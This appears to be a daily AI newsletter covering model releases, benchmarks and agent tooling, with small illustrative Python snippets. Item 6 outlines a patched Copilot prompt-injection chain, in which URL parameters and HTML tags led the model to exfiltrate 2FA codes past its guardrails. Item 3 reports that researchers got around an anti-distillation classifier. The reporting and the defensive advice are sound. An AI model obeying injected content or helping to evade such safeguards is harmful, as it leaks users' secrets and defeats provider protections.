Inference Brew

Z.ai Releases GLM-5.2 Open-Weights Model with 1M Context Window

1. Z.ai Releases GLM-5.2 Open-Weights Model with 1M Context Window

The model incorporates architectural optimizations including IndexShare, which reuses an indexer across sparse attention layers to reduce FLOPs by 2.9 times at maximum context length. It also includes a Multi-Token Prediction layer for speculative decoding that increases accepted token length by up to 20% during inference. Developers can also access the model through the new GLM Coding Plan, which starts at $12.60 per month.

  • GLM-5.2 is a 753-billion parameter open-weights model released under the permissive MIT license.
  • The model features a 1-million-token context window and supports 'Max' and 'High' thinking modes to adjust reasoning effort.
  • It scored 62.1 on SWE-bench Pro and 74.4 on FrontierSWE, outperforming GPT-5.5 on both benchmarks.
  • API access is priced at $1.40 per million input tokens and $4.40 per million output tokens.
  • The model is available immediately on Hugging Face, Ollama for local execution, and the Z.ai API.

Developers can self-host, or access through the API, an MIT-licensed coding model that rivals closed-source frontier models at a fraction of the cost.
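
To make the API pricing above concrete, here is a minimal sketch that estimates the cost of a single request from the two listed rates. The request sizes are hypothetical, and the calculation assumes flat per-token pricing with no caching discounts or tiering, which the item does not describe.

```python
# Rates quoted in the item above, in USD per million tokens.
INPUT_PRICE_PER_M = 1.40
OUTPUT_PRICE_PER_M = 4.40


def estimate_cost(input_tokens: int, output_tokens: int) -> float:
    """Return the estimated USD cost of one request at the listed rates."""
    total = input_tokens * INPUT_PRICE_PER_M + output_tokens * OUTPUT_PRICE_PER_M
    return total / 1_000_000


# Hypothetical request: a full 1M-token prompt and a 10K-token reply.
cost = estimate_cost(1_000_000, 10_000)
print(f"${cost:.3f}")
```

Under these assumptions, filling the whole context window costs far more on input than on output, so prompt size is the figure to watch.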

2. SubQ 1.1 Small Achieves 12M Token Context with Subquadratic Attention

The model was trained using staged context extension followed by approximately one trillion tokens of continued pretraining on long artifacts. These benchmark results were independently verified by Appen, demonstrating the viability of subquadratic attention for extreme context lengths.

  • SubQ 1.1 Small is the second iteration of the Subquadratic Sparse Attention (SSA) model architecture.
  • The model achieves near-perfect long-context retrieval up to 12 million tokens on the needle-in-a-haystack test.
  • At a 1-million token context, it requires 64.5 times less compute than dense attention and runs 56 times faster than FlashAttention-2.
  • It scored 99.12% on the RULER benchmark at 128K tokens and 85.4% on GPQA Diamond.
  • The model is currently deployed with select design partners, with broader releases planned for later in 2026.

Developers can process massive codebases or document sets with drastically reduced compute requirements and faster inference speeds, once the model is available beyond its design partners.

3. Qwable-v1 Open-Weights Model Distilled from Claude Fable-5

Claude Fable-5 featured an anti-distillation classifier that redacted thinking blocks within its API, but researchers bypassed this by training on cleartext traces. The resulting Qwable-v1 model and its SFT dataset are now publicly available on Hugging Face, offering a local alternative for complex software engineering tasks.

  • Qwable-v1 is based on the Qwen3.6-35B-A3B architecture and is released under the AGPL-3.0 license.
  • The model was distilled from Claude Fable-5, which was suspended due to U.S. export-control directives after a brief release.
  • It was trained on 4,659 cleartext agentic-coding traces from the Glint-Research/Fable-5-traces corpus.
  • Training took approximately 14 hours on a single NVIDIA H200 GPU.
  • Qwable-v1 retains the ability to emit XML-formatted tool calls, including the str_replace_editor tool.

Developers can run a local, open-weights model optimized for agentic coding tasks and XML-formatted tool calls without relying on expensive or restricted APIs.
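
As an illustration of what consuming an XML-formatted tool call might look like in an agent harness, here is a minimal sketch. The tag layout (`tool_call`, `name`, `parameters`) and the parameter names are assumptions made for this example; the item does not specify the exact schema Qwable-v1 emits.

```python
import xml.etree.ElementTree as ET

# Hypothetical model output; the real Qwable-v1 tag names may differ.
raw = """
<tool_call>
  <name>str_replace_editor</name>
  <parameters>
    <command>str_replace</command>
    <path>src/app.py</path>
    <old_str>return 1</old_str>
    <new_str>return 2</new_str>
  </parameters>
</tool_call>
"""


def parse_tool_call(text: str) -> tuple[str, dict[str, str]]:
    """Extract the tool name and its parameters from one XML tool call."""
    root = ET.fromstring(text.strip())
    name = root.findtext("name")
    if name is None:
        raise ValueError("tool call has no <name> element")
    params_node = root.find("parameters")
    params = {}
    if params_node is not None:
        params = {child.tag: (child.text or "") for child in params_node}
    return name, params


def apply_str_replace(source: str, old: str, new: str) -> str:
    """Replace `old` with `new`, refusing ambiguous or missing matches."""
    if source.count(old) != 1:
        raise ValueError("old_str must match exactly once")
    return source.replace(old, new)


tool_name, tool_params = parse_tool_call(raw)
edited = apply_str_replace(
    "def f():\n    return 1\n", tool_params["old_str"], tool_params["new_str"]
)
print(tool_name, tool_params["path"])
print(edited)
```

Requiring exactly one match is a design choice for this sketch: it keeps an edit from silently touching the wrong location when the model's `old_str` is not specific enough.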

4. VibeThinker-3B Small Reasoning Model Achieves Frontier Coding Scores

The model's high success rate on unseen coding challenges indicates strong generalization capabilities despite its small size. The research paper detailing the architecture and training methodology is available on Hugging Face.

  • VibeThinker-3B is a small language model designed to test verifiable reasoning in a parameter-dense regime.
  • The model achieved a 96.1% success rate on recent unseen LeetCode contests, passing 123 out of 128 first-attempt Python submissions.
  • It scored 94.3 on the AIME'26 math benchmark and 80.2 on LiveCodeBench v6.
  • Evaluation used vLLM and SGLang with a temperature of 1.0 and top_p of 0.95.

Developers can leverage a highly compact 3-billion parameter model for local, low-latency coding and mathematical reasoning tasks.
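
For readers unfamiliar with the sampling settings listed above, the following is a generic, pure-Python sketch of temperature scaling followed by nucleus (top-p) filtering. It is not the vLLM or SGLang implementation, and the function name and toy logits are made up for illustration.

```python
import math
import random


def sample_top_p(logits, temperature=1.0, top_p=0.95, rng=random):
    """Sample a token index using temperature scaling and top-p filtering."""
    # Temperature rescales logits before the softmax; 1.0 leaves them unchanged.
    scaled = [x / temperature for x in logits]
    peak = max(scaled)
    exps = [math.exp(x - peak) for x in scaled]  # subtract max for stability
    total = sum(exps)
    probs = [e / total for e in exps]

    # Keep the smallest set of most likely tokens whose mass reaches top_p.
    order = sorted(range(len(probs)), key=lambda i: probs[i], reverse=True)
    kept, mass = [], 0.0
    for i in order:
        kept.append(i)
        mass += probs[i]
        if mass >= top_p:
            break

    # rng.choices renormalizes the weights of the surviving tokens.
    weights = [probs[i] for i in kept]
    return rng.choices(kept, weights=weights, k=1)[0]


# Toy example: the first token dominates, so the nucleus holds only index 0.
samples = [sample_top_p([10.0, 0.0, 0.0, 0.0]) for _ in range(100)]
print(set(samples))
```

With a temperature of 1.0 the model's distribution is used as-is, and a top_p of 0.95 only trims the least likely 5% of probability mass.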

5. Microsoft Releases FastContext 4B Model for Repository Exploration

Repository exploration is a major bottleneck for coding agents, often requiring massive context windows or expensive search queries. FastContext provides a lightweight, specialized alternative that streamlines how agents navigate and retrieve code from large repositories.

  • FastContext is a 4-billion parameter model released by Microsoft on Hugging Face.
  • The model is optimized specifically for efficient code retrieval and repository exploration by coding agents.
  • It enables open-source coding agents to compete with closed-source models on the SWE-Bench Multilingual benchmark.
  • The model is based on the research paper "FastContext: Training Efficient Repository Explorer for Coding Agents."

Developers can integrate this specialized 4B model into their coding agent pipelines to improve repository-scale code retrieval without relying on expensive closed-source models.

6. Microsoft Patches Critical Copilot Vulnerability That Exposed 2FA Codes

The exploit chain demonstrates how attackers can use markup language or HTML tags embedded in third-party content to force the LLM to exfiltrate data via web requests. Microsoft patched the vulnerability last week, but the attack vector highlights ongoing challenges in securing agentic workflows that process external data.

  • The vulnerability allowed attackers to retrieve 2FA codes and sensitive data from emails accessible to Copilot.
  • Security firm Varonis developed the exploit chain using "Parameter-to-Prompt Injection" via URL query parameters.
  • The exploit bypassed Microsoft's existing guardrails, which include wrapping output in blocks and restricting untrusted websites.
  • The root cause is the fundamental inability of LLMs to distinguish between user instructions and untrusted third-party content.

Developers building LLM applications should treat all third-party content as untrusted and limit the ways model output can trigger web requests, since guardrails alone did not stop this exploit chain.
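
One common defense-in-depth measure against the exfiltration channel described above is to strip links and images that point to non-allowlisted hosts before model output is rendered. The sketch below is a generic illustration, not Microsoft's mitigation; the allowlist and regular expressions are assumptions and are deliberately simple rather than a complete HTML or Markdown parser. It narrows one channel and does not solve prompt injection itself.

```python
import re
from urllib.parse import urlparse

ALLOWED_HOSTS = {"example.com"}  # hypothetical allowlist for this sketch

# Markdown links and images: [text](url) or ![alt](url "title")
MD_LINK = re.compile(r"!?\[([^\]]*)\]\(([^)\s]+)[^)]*\)")
# Any HTML tag carrying a src= or href= attribute.
HTML_TAG_WITH_URL = re.compile(
    r"<[^>]*\b(?:src|href)\s*=\s*[\"']?([^\"'\s>]+)[^>]*>", re.IGNORECASE
)


def is_allowed(url: str) -> bool:
    """Allow only absolute URLs whose host is on the allowlist."""
    host = urlparse(url).hostname
    return host is not None and host.lower() in ALLOWED_HOSTS


def sanitize(text: str) -> str:
    """Drop links and images that would trigger requests to unknown hosts."""

    def md_repl(match: re.Match) -> str:
        # Keep the visible text, drop the URL, when the host is not allowed.
        return match.group(0) if is_allowed(match.group(2)) else match.group(1)

    def html_repl(match: re.Match) -> str:
        # Remove the whole tag; relative URLs have no host and are dropped too.
        return match.group(0) if is_allowed(match.group(1)) else ""

    text = MD_LINK.sub(md_repl, text)
    return HTML_TAG_WITH_URL.sub(html_repl, text)


unsafe = "Your code ![x](https://evil.test/c?d=123456) is ready."
print(sanitize(unsafe))
```

An allowlist is used instead of a blocklist because attackers control the destination host, so any host not explicitly trusted should be assumed hostile.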

7. Cursor and Graphite Engineers Announce Origin, an Agent-First Git Competitor

Traditional version control systems like Git can be difficult for autonomous agents to navigate due to complex branching and merge conflicts. Origin addresses this by providing agent-friendly interfaces and automated resolution tools, making it easier to integrate coding agents directly into production CI/CD pipelines.

  • Origin is a new version control platform designed to be highly scalable for AI agent workloads.
  • The platform is fully extensible through APIs and the Model Context Protocol (MCP).
  • It features built-in automated tools for merge conflict resolution and CI/CD failure resolution.
  • The product was announced by Tomas Reimers, an engineer at Cursor and Graphite.

Developers can build agentic workflows that interact with version control more reliably using native APIs, MCP support, and automated conflict resolution.

8. Stanford's DeLM Cuts Multi-Agent Costs by 50% Without Orchestrators

Traditional multi-agent systems rely on a central orchestrator, which introduces significant communication overhead and API costs. By decentralizing coordination and allowing agents to read and write to a shared gist database, DeLM parallelizes execution and eliminates redundant LLM calls.

  • DeLM enables AI agents to coordinate directly using a shared knowledge base of summaries called "gists" and a task queue.
  • The framework reduced task costs by approximately 50% and performed 10.5% better than the strongest baseline on SWE-bench Verified.
  • Agents share verified findings, documented failures, and constraints to prevent redundant exploration.
  • An unfoldable system provides compact summaries by default, allowing agents to access detailed evidence only when needed.
  • DeLM achieved the highest accuracy across four major model families on the LongBench-v2 Multi-Doc QA benchmark.

Developers can build highly parallel, cost-effective multi-agent applications that avoid the latency and communication bottlenecks of centralized orchestrators.
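
The coordination pattern described above, a task queue plus a shared store of compact gists that can be unfolded on demand, can be sketched roughly as follows. This is a single-process illustration under stated assumptions, not DeLM's implementation: every class, field, and function name here is hypothetical, and a real parallel deployment would need locking or a database.

```python
from collections import deque
from dataclasses import dataclass, field


@dataclass
class Gist:
    topic: str
    summary: str            # compact view that agents read by default
    evidence: str = ""      # detailed record, read only when unfolded
    kind: str = "finding"   # e.g. "finding", "failure", or "constraint"


@dataclass
class SharedState:
    tasks: deque = field(default_factory=deque)
    gists: dict = field(default_factory=dict)

    def claim(self):
        """Take the next task, or None when the queue is empty."""
        return self.tasks.popleft() if self.tasks else None

    def publish(self, gist: Gist) -> None:
        self.gists[gist.topic] = gist

    def summaries(self) -> dict:
        return {topic: g.summary for topic, g in self.gists.items()}

    def unfold(self, topic: str) -> str:
        return self.gists[topic].evidence


def run_agent(state: SharedState, solve) -> list:
    """Pull tasks until the queue is empty, skipping already-covered topics."""
    done = []
    while (task := state.claim()) is not None:
        if task in state.gists:
            continue  # another agent already published a gist for this task
        summary, evidence = solve(task, state.summaries())
        state.publish(Gist(task, summary, evidence))
        done.append(task)
    return done


state = SharedState(tasks=deque(["parse config", "fix test", "parse config"]))
done = run_agent(state, lambda task, known: (f"solved {task}", f"log for {task}"))
print(done)
print(state.summaries())
```

No orchestrator appears in the loop: each agent decides what to do from the queue and the shared summaries, which is where the reduction in redundant calls would come from.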

9. Databricks Launches Lakehouse//RT and LTAP for Real-Time Agent Data

AI agents often struggle with stale data due to the latency of traditional ETL pipelines. By combining transactional and analytical processing directly at the storage layer, Databricks aims to simplify the data stack, allowing agents to make decisions based on real-time operational data.

  • Lakehouse//RT delivers sub-100ms query latency directly on Delta and Iceberg tables, removing the need for a dedicated real-time serving tier.
  • The Reyden compute engine handles high-concurrency, low-latency serving, reaching up to 12,000 queries per second.
  • LTAP (Lake Transactional/Analytical Processing) automatically stores Postgres-native transactional data in Delta and Iceberg formats at the point of write.
  • The architecture utilizes Lakebase, a serverless cloud-based PostgreSQL database service, to unify data at the storage layer.
  • LTAP performs row-to-column conversion in a caching layer to minimize network costs.

Developers can build AI agents that query live operational and analytical databases directly with sub-100ms latency, eliminating the need for complex ETL pipelines.
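
For readers new to the row-to-column conversion mentioned above, here is a toy sketch of the idea: transactional rows are pivoted into one list per column, the layout analytical formats favor. It says nothing about how LTAP implements the step; the function name and sample rows are hypothetical, and all rows are assumed to share the same keys.

```python
def rows_to_columns(rows):
    """Pivot a list of row dicts into a dict of column lists."""
    if not rows:
        return {}
    keys = list(rows[0].keys())
    # Raises KeyError if a later row is missing a column from the first row.
    return {key: [row[key] for row in rows] for key in keys}


# Hypothetical transactional rows, as a row store would hold them.
rows = [
    {"id": 1, "status": "paid", "amount": 9.5},
    {"id": 2, "status": "open", "amount": 4.0},
]
columns = rows_to_columns(rows)
print(columns)
```

An aggregate such as `sum(columns["amount"])` then touches a single contiguous column instead of every field of every row.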

10. cuTile Rust Enables Safe, High-Performance GPU Kernel Development

Writing custom CUDA kernels is notoriously error-prone and difficult to debug. cuTile Rust addresses this by bringing Rust's compile-time safety guarantees to GPU programming, supporting synchronous launches, asynchronous pipelines, and CUDA graph replays under the Apache License, Version 2.0.

  • cuTile Rust uses a procedural macro to JIT-compile Rust ASTs into GPU cubins via CUDA Tile IR.
  • On an NVIDIA B200 GPU, it achieves 2 PFLOP/s for GEMM, representing 92% of dense f16 peak performance.
  • The Grout inference engine, built on cuTile, runs Qwen3-4B at 171 tokens/second on an RTX 5090.
  • The system extends Rust's ownership discipline across the GPU launch boundary to prevent data races.
  • It requires an NVIDIA GPU with compute capability sm_80 or higher, CUDA 13.3, and Rust 1.89 or later.

Developers building custom local inference engines or optimizing model execution can write safe GPU kernels in Rust without sacrificing raw CUDA performance.

11. Fast-Walk Library Speeds Up Python AST Parsing by 220x

Standard Python AST parsing can become a major bottleneck when agents generate and validate code iteratively. By replacing the standard library's ast.walk with this optimized Rust implementation, developers can accelerate the validation loop of their coding agents.

  • The fast-walk library was developed to resolve performance bottlenecks in the Reflex AI linter when processing generated Python code.
  • Transliterating the walking logic into Rust using PyO3 yielded an initial 78% cumulative performance improvement.
  • Optimizations including direct dictionary access and precomputing AST subclass info in a 2KB table achieved a final 220x speedup.
  • The source code is open-source and available on GitHub under the reflex-dev/fast-walk repository.

Developers building code-generation tools, linters, or LLM agents can drastically reduce the latency of parsing and analyzing Python ASTs.
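
For context, this is the standard-library pattern that the library targets: a validation pass that walks every node of a parsed module with `ast.walk`. The snippet uses only the Python standard library; fast-walk's own API is not described in the item, so it is not shown here.

```python
import ast

source = """
def add(a, b):
    return a + b

print(add(1, 2))
"""

tree = ast.parse(source)

# ast.walk yields every node in the tree, in no guaranteed order.
call_names = sorted(
    node.func.id
    for node in ast.walk(tree)
    if isinstance(node, ast.Call) and isinstance(node.func, ast.Name)
)
print(call_names)  # ['add', 'print']
```

A linter typically runs many such passes per file, which is why the cost of the walk itself matters when an agent validates code on every iteration.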

12. Fireworks and LangChain Build 100x Cheaper Chatbot Trace Judge

Evaluating chatbot interactions typically requires expensive frontier LLMs to act as judges. By fine-tuning a smaller, specialized model on specific interaction traces, Fireworks and LangChain demonstrated that developers can achieve production-grade evaluation accuracy without the high API costs.

  • The trace judge is based on the Qwen-3.5-35B model and is designed to detect user-identified errors.
  • Fine-tuning the model on chat-langchain data allowed it to meet or exceed the performance of frontier models.
  • The fine-tuned judge operates at approximately 100 times lower cost than using frontier models for evaluation.

Developers can evaluate and monitor chatbot performance at a fraction of the cost of using frontier models for trace evaluation.

13. Artificial Analysis Updates Intelligence Index to Focus on Agentic Workloads

The updated GDPval-AA v2 benchmark re-baselines Elo to human performance at 1000, utilizes a rotating panel of frontier-model judges, and increases the turn limit to 250. Task completion times in the index range widely, from 1.5 minutes for Grok 4.3 (high) to 13.5 minutes for Claude Sonnet 4.6 (max).

  • Intelligence Index v4.1 introduces three new per-task metrics: cost per task, time per task, and tokens per task.
  • The update upgrades several benchmarks, including Terminal-Bench 2.1 and τ³-Bench Banking, while removing the saturated IFBench.
  • Claude Opus 4.8 (max) leads available models with a score of 56, followed closely by GPT-5.5 (xhigh) at 55.
  • DeepSeek V4 Pro (max) and MiniMax M3 lead the open-weights category, both scoring 44.
  • The index reports that DeepSeek V4 Pro (max) costs $0.04 per task, compared to $1.78 for Claude Opus 4.8 and $0.99 for GPT-5.5 (xhigh).

Developers can compare frontier and open-weights models using concrete, agent-focused metrics like cost and execution time per task.
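
To put the per-task costs above in perspective, the sketch below derives relative cost and a budget for a batch of tasks from the three quoted figures. The batch size of 1,000 tasks is a hypothetical workload, and the calculation assumes cost scales linearly with task count.

```python
# Cost per task in USD, as reported in the item above.
cost_per_task = {
    "DeepSeek V4 Pro (max)": 0.04,
    "Claude Opus 4.8": 1.78,
    "GPT-5.5 (xhigh)": 0.99,
}

baseline = cost_per_task["DeepSeek V4 Pro (max)"]
TASKS = 1_000  # hypothetical workload size

# Relative cost versus the cheapest listed model, and the batch budget.
ratios = {model: cost / baseline for model, cost in cost_per_task.items()}
budgets = {model: cost * TASKS for model, cost in cost_per_task.items()}

for model in cost_per_task:
    print(f"{model}: {ratios[model]:.2f}x baseline, ${budgets[model]:,.2f} per {TASKS} tasks")
```

Cost alone does not settle the choice, since the same index scores the models differently (44 versus 56 and 55), so the ratio is best read alongside the score gap.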

14. Analysis Warns of Performance Issues in Small-Scale Claude Distillations

While distilled models promise frontier-level capabilities in smaller open-weights packages, the low volume of fine-tuning data often fails to capture complex reasoning behaviors. Developers are advised to run independent evaluations for their specific use cases rather than assuming distilled variants are inherently superior to the base models.

  • Recent distillations typically use only 4,000 to 10,000 samples, which may be too low to improve model quality.
  • These distilled models can exhibit increased hallucinations and slower performance compared to the base Qwen 3.6 model.
  • Successful distillations, such as DeepSeek-R1, typically require much larger datasets of around 700,000 samples.
  • The Qwopus model, distilled from Claude Opus 4.8, has been reported to exhibit hallucinations and slower execution.

Developers can avoid the performance degradation and hallucinations that come from deploying poorly trained distilled models by evaluating them against the base model first.

15. Developer Setup and Benchmarks for Local Agentic Coding

While local models have become significantly more capable for programming tasks over the last six months, the author notes they are not yet ready for production software development. Sandboxing the inference server and agent harness in Docker is recommended to restrict system access during execution.

  • The setup utilizes the Gemma 4 model family, specifically gemma-4-26b-a4b and gemma-4-12b-qat, on an M2 Mac with 64 GB of RAM.
  • Local agentic coding is estimated to operate at approximately 75% of the accuracy and speed of closed-source frontier models.
  • The architecture runs LM Studio as an inference server and Pi as an agent harness, both sandboxed inside Docker containers.
  • Key limitations include slow inference speeds, limited context windows, and occasional prompt template mismatches.

Developers can reference this real-world architecture to set up local, sandboxed coding environments while understanding current performance trade-offs.

16. Anthropic Pauses Planned API Billing for Claude Agent SDK

The original billing change, announced on May 13, aimed to treat Claude Agent SDK usage separately from standard chat interface or official CLI usage. Analysis indicates that, under the current subscription model, Claude Opus subscribers come out ahead of API pricing after sending just two to three messages per day.

  • Anthropic paused the pricing changes just before they were scheduled to take effect on June 15.
  • Agent SDK users can continue using their existing Claude subscription limits rather than being billed at separate API rates.
  • The paused plan would have billed SDK usage at standard API rates, offset by a monthly credit equal to the subscription price.
  • Under current subscription tiers, Agent SDK usage remains limited only by standard weekly caps.

Developers building with the Claude Agent SDK can avoid unexpected API charges and continue leveraging their existing subscription caps for agentic workloads.
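
The paused plan's mechanics, API-rate billing offset by a credit equal to the subscription price, can be sketched as simple arithmetic. The dollar amounts below are hypothetical, and the sketch assumes the credit applies once per month and that usage beyond it is billed in full, details the item does not spell out.

```python
def extra_charge_under_paused_plan(api_usage_usd: float, subscription_usd: float) -> float:
    """Amount owed on top of the subscription once the monthly credit is used up."""
    return max(0.0, api_usage_usd - subscription_usd)


# Hypothetical month: a $100 subscription and $250 of SDK usage at API rates.
heavy = extra_charge_under_paused_plan(250.0, 100.0)
# Hypothetical light month: usage stays within the credit.
light = extra_charge_under_paused_plan(50.0, 100.0)

print(heavy, light)  # 150.0 0.0
```

With the change paused, both months would incur no extra charge, and usage is bounded by the subscription's weekly caps instead.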

Inference Brew in your inbox

5 minutes a day. Free, unsubscribe anytime.
